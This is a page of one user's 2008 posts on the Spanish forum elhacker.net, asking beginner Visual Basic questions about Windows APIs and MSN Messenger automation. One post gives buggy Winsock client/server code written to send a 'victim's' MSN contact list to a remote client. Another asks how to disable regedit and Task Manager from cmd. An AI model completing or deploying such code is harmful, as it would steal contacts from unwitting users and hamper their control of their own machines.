elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


  Mostrar Temas
Páginas: 1 2 [3] 4 5 6 7
21  Programación / Programación Visual Basic / donde puedo encontrar un BUEN tutorial sobre esta API en: 21 Abril 2008, 00:45 am
Hola, gente bueno se que estos ultimos dias e estado demasiado fastidioso, y espero que me disculpen lo que pasa es que me estoy metiendo en este nuevo mundo de las API, y pues me ha estado costando algo, aunque ya domino ciertas cosas, pues ahora bien, esta api es Keybd_event, que como el SendKeys nos permite enviar pulsaciones, pero por medio del API es ams seguro que el sendkeys lo que pasa es que no encontre un buen tuto donde me expliquen sus parametros, y como usarla etc....
y pues queria saber si alguno de ustedes me podria pasar un tuto o algo que me enseñe eso! ;)...

Gracias y de nuevo disculpen las molestias! :P
22  Programación / Programación Visual Basic / ayuda con el Winsock y envio de contactos en: 20 Abril 2008, 22:24 pm
saludos, bueno miren tengo este problema, es el siguiente....

Estoy haciendo un programa que me permite desde el cliente al darle a un command1 este envie por el Ws(Winsock) un dato o orden por decirlo asi, ahora que en el server cuando llegue este cheke si es el dato, pongan que es car, entonces el server ve si es car entonces este lista TODOS los contactos del MSN de la persona en una variable y los envia al cliente y el cliente comprueba que ese dato enviado contiene los contactos y los lista en un listbox ahora... este code esta correcto?

CLIENTE

Código:
Private sub Command1_Click()
ws.SendData car
End sub

SERVER

Código:
Private sub ws_DataArribal(LoQueVaAquixD)
dim dato as string
dim cont as long
dim user as IMessengerContact

ws.getdata dato
if dato = car then
for each user in MsgrUIA.MyContacts
cont = user.SigningName & "|"
next
end if
ws.SendData cont
end sub

CLIENTE


Código:
Private sub ws_DataArribal(LoQueVaAkixD)
dim datos as string
din contactos() As string

ws.GetData datos
if datos = cont then
contactos = Split(datos, "|")
for i = UBound(contactos) to LBound(Contactos)
List1.additem contactos(i)
next
end if
end sub

Sabiendo que lo que hace el code del server es enviar los contactos de la victima al cliente, este los esplitea y los lista en un listbox, ahora es correcto ese code?? y si no  lo es en que me he equivocado y como lo podria solucionar?...
23  Programación / Programación Visual Basic / Ayuda con el parametro de esta API? en: 18 Abril 2008, 23:52 pm
hola gente bueno esta es mi duda trabajo con la API FindWindow, pues esta tiene un parametro, que es:

lpClassName Nombre de la clase de la ventana a buscar

pero como hago para saber el IpClassName de las ventanas? osea como lo puedo obtener?

Grax!
24  Programación / Programación Visual Basic / Ayuda con sendmessage en: 17 Abril 2008, 03:47 am
hola bueno está es mi duda en el sendmessage hay un parámetro el segundo primero viene el hwnd, pues hay se pone cierto valor pero como se que es ese valor y como uso ese
valor?
25  Programación / Programación Visual Basic / Sera que alguien me puede explicar estas APIs que no estoy claro? en: 15 Abril 2008, 20:41 pm
hola, bueno amigos disculpenme, este es mi problema voy a trabajar con el portapapeles y voy a utilizar ciertas APIs lo que pasa es que busque info sobre ellas pero la info que me aparecio mayormente esta en ingles, y desgraciadamente no se hablar en ingles, a ver si alguien me podria facilitar alguna pagina en español que me expliquen como utilizarlas? o si me puedieran explicar, se que soy necio, y disuclpen!

Private Declare Function OpenClipboard Lib "user32" (ByVal hWnd As Long) As Long
Private Declare Function CloseClipboard Lib "user32" () As Long
Private Declare Function EmptyClipboard Lib "user32" () As Long
Private Declare Function SetClipboardData Lib "user32" (ByVal wFormat As Long, ByVal hMem As Long) As Long
Private Declare Sub CopyMem Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)


pues estas son, a ver si me podrrian facilitar algo gracia!
26  Programación / Scripting / como peudo deshabilitar el regedit y el taskman desde el cmd en: 9 Abril 2008, 20:08 pm
hola, bueno esta es mi duda, ya busque en el buscador pero me llevo a otras que no tienen que ver con el cmd como lo puedo hacer desde el cmd?

Gracias de antemano! :P
27  Programación / Programación Visual Basic / como obtener el nombre de las ventanas o el WindowClass? en: 8 Abril 2008, 20:59 pm
saludos, bueno esta es mi duda por ejemplo si quiero ocultar una ventana del cmd por ejemplo me dijero que lo hiciera asi! :

Código:
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function ShowWindow Lib "user32" (ByVal Hwnd As Long, ByVal nCmdShow As Long) As Long
Private Sub Form_Load()
Dim Hwnd As Long
Hwnd& = FindWindow("ConsoleWindowClass", "D:\WINDOWS\system32\command.com")
If Hwnd& > 0 Then
Dim Hide As VbMsgBoxResult
Hide = MsgBox("Ventana MS-DOS encontrada con Hwnd: " & CStr(Hwnd&) & vbCr & "¿Ocultar?", vbInformation + vbYesNo, "Ocultar")
If Hide = vbYes Then
ShowWindow Hwnd&, 0
Else
ShowWindow Hwnd&, 5
End If
End If
End Sub

mi duda es esta, como puedo obtener los demas nombres de las ventanas osea en este caso seria ConsoleWindowClass pero si quisiera encontrar o hacer este metodo con una ventana de internet como encuentro ese WindowClass, osea como le puedo sacar el nombre a las ventanas?
28  Programación / Programación Visual Basic / como puedo usar estas referencias del MSN? en: 30 Marzo 2008, 21:54 pm
hola, bueno me di una vuelta por el MSDN y encontre varias cosas interesantes del VB para el MSN el problema es que no me explican como utilizarlas adecuadamente a ver si ustedes me ayudan!....

con el IMessengerConversationWnd (Se usarla) pero existen estos dos metodos que no se como usarlo

- addcontact
- history


y no entiendo en el MSDN tambien estan otros como:

IMessengerIMWindow

    * Application
    * Close
    * Height
    * History
    * HWND


y

IMessengerApp

    * Application
    * AutoLogon


espero que no sea molestia y me expliquen las que peudan solo como usarlas! ;)

disculpen las moletias!
29  Programación / Programación Visual Basic / Como lo detectar lo qué me escriben en el msn y... en: 29 Marzo 2008, 21:41 pm
hola bueno mi pregunta es algo difícil y es esto...

Como puedo detectar lo qué alguien me escribe en el msn y si lo que a escrito lo ha escrito mas de 7 veces pues automatikamente cierre la conversacion de ese contacto??

Gracias
30  Programación / Programación Visual Basic / omo poner sin admisión a un contacto del msn con la API en: 27 Marzo 2008, 18:03 pm
ola bueno como puedo hacer eso?
Páginas: 1 2 [3] 4 5 6 7
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines